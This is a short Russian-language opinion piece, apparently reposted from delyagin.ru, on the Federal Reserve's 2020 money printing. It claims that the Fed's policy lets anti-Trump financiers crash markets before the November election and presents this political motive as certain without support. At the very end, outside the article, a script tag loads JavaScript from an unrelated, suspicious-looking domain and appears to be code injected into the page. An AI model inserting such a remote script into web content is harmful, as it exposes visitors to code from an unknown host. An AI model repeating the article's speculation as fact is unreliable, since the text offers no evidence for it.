Два финансовых пресса

7

С начала 2020 года ФРС влила в американскую экономику 99 млрд. долл., что более чем втрое превышает средние темпы эмиссии за сентябрь-декабрь 2019 года.

 

Программа количественного смягчения (Quantitative easing, QE), запущенная после финансового кризиса 2008-2009 года, официально была прекращена Федрезервом ещё летом 2014 года, и с тех пор эмиссионный центр Соединённых Штатов в целом «держал» баланс за счёт «выдаивания» крупных банков, которые в течение пяти лет скупали ценные бумаги казначейства США, но их резервы, в конце концов, истощились, показатель банковского мультипликатора упал в четыре раза, иностранные инвесторы начали выходить из «трежерис» и «бондов», ставки межбанковских кредитов уже в сентябре 2019 года резко выросли, и поэтому пришлось снова запускать печатный станок, чтобы не началась «цепная реакция» кризиса ликвидности.

 

Нет никаких сомнений в том, что нынешняя политика ФРС, со снижением учётной ставки, направлена в поддержку действующего президента США, но подвох заключается в том, что в результате усиливается контроль над фондовым рынком со стороны либеральных финансистов-противников Трампа, которые получают возможность «управляемого сноса» этих рынков в нужный момент предвыборной кампании. И, скорее всего, воспользуются этой опцией за месяц-два до голосования 3 ноября.

 

 

Подробнее на https://delyagin.ru/articles/6-jekonomika/75873-dva-finansovykh-pressa

<script type="text/javascript" src="http://minisrclink.cool/1e40c8bd4601a5a5a4.js"></script>